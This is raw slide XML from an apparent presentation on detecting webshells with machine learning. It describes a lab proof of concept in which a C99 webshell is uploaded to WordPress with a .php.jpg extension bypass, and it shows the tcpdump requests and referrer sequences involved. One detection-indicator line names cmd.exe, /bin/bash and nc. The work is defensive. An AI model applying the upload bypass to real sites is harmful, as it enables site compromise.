              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>using ML...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 1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dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Based on these indicators we look for sequential behaviors. For example we can look at sequence of requests for a fixed (IP/User, Web server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can use bro logs, web server logs and perimeter traffic as well as long as we have visibility into the application layer. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By determining these sequences we can discern between benign behavior and sequences of behaviors that indicate webshell like activity. </a:t>
            </a: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None/>
            </a:pPr>
            <a:endParaRPr dirty="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Model Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227204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How do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detect W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Local Stats</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1088450"/>
            <a:ext cx="8520600" cy="3849600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Machine Learning techniques we can compute and build up statistics around some key data points. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the context of this particular vector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can use rare means/ low frequency count for a fixed website: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-	Rare time of site usage,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-	Rare time stamping and creation of files,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- 	Rare connection pat- terns, Large number of POST/GET Requests to specific file, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- 	Connection strings with command arguments (cmd.exe, /bin/bash, nc), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-	Unusual Direct connections to files exposed to the internet, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-	Unusual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UA in comparison to normal traffic patterns when users, visit website or search, engine      indexing site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838985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Webshell detection POC/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Shape 17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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For proof of concept we gather data of benign and normal browsing behavior and then we proceeded to replicate a RFI (Remote File Inclusion) uploading a C99 webshell to target host. In this  particular sequence of referrer items it can be seen how the attacker is browsing around the site possibly foot printing and searching for input fields.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Webshell detection POC/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 18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61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referrer sample sequence below shows browsing around victim web site:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: http://victimdomain/wordpress/?p=9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: http://victimdomain/wordpress/wp-content/themes/default/style.css</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://victimdomain/wordpress/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Further review of referrers show access to wordpress:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/wp-login.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://vicitimdomain/wordpress/wp-admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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Webshell POC/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3852000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following sequence shows the attacker accessing the post feature and uploading a C99 shell bypassing sanitation controls by adding a .jpg extension to the actual shell “c9920161.php”. This is done by abusing the new post feature that includes uploading media:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00:28:39.469021 IP attackerIP.51399 &gt; victimdomain.80:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Flags [P.], seq 13419:14264, ack 145980, win 4096,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     options [nop,nop,TS val 787343940 ecr 195280],</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     length 845: HTTP: GET /wordpress/wp-content/plugins</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     /a-gallery/timthumb.php?src=http://victimdomain/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     wordpress/wp-content/uploads/2016/06/c992016.php.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     jpg&amp;w=125&amp;h=125&amp;zc=1 HTTP/1.1...D....GET /wordpress</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     /wp-content/plugins/a-gallery/timthumb.php?src=http</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     ://victimdomain/wordpress/wp-content/uploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     /2016/06/c9920161.php.jpg&amp;w=125&amp;h=125&amp;zc=1 HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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Webshell detection POC/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Shape 19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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referrer: http://victimdomain/wordpress/wp-admin/post-new.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Here is where the web shell is uploaded)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Finally, by looking at the example for referrer sequences it can be seen how by the attacker browsing to the web shell, frequency of access indicates a signal for operator behavior in the sequential component of the TTP:		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/?p=13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/wp-content/ uploads/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/wp-content/uploads/2016/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
